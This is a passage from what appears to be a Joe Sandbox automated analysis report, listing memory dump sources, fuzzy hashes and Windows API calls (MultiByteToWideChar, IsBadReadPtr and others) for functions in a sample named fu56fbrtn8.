• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CommandLine
• String ID: p&y
• API String ID: 3253501508-1102576638
• Opcode ID: d96ee7b491122d964c7afe4c37068d1a4eb8f627236e32ddc7b053f892eebbba
• Instruction ID: 73f3f546a311b841304e98eb27d6204785dfcdfef6e25f284d4732b552481ae4
• Opcode Fuzzy Hash: d96ee7b491122d964c7afe4c37068d1a4eb8f627236e32ddc7b053f892eebbba
• Instruction Fuzzy Hash: 31B09278C202788FC7108F3889BD0853BA9B308222380289FD852C2F00DF380106CFA0
Uniqueness
Uniqueness Score: -1.00%
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,15681D55), ref: 156C0D27
• GetLastError.KERNEL32 ref: 156C0D35
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 156C0D90
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: d9269779a007f60f2155adcac4eb4b6e58cba1e32a3f416ad37d12937d5f4d5f
• Instruction ID: a59b51f7d8f9349d78813ecb043f65b01ec4fb22e3829406f12aa855605b7a93
• Opcode Fuzzy Hash: d9269779a007f60f2155adcac4eb4b6e58cba1e32a3f416ad37d12937d5f4d5f
• Instruction Fuzzy Hash: C741C639A04256AFCB118F65C844BAE7BA9FF03730F1181E9EC55AB191DB70B901C7D0
Uniqueness
Uniqueness Score: -1.00%
APIs
• IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02DF9FD0
• IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02DFA000
• IsBadReadPtr.KERNEL32(?,00000008), ref: 02DFA01F
• IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 02DFA02B
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Read$Write
• String ID:
• API String ID: 3448952669-0
• Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
• Instruction ID: 6d64bb20a25491a925f5e68634c22da23e0dcc80c88cf06363e0930b7f95d247
• Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
• Instruction Fuzzy Hash: D521D5B060021AABCF50DF24DC80B9E73A9EF84361F158515EF0497348E734DD11CAA8
Uniqueness
Uniqueness Score: -1.00%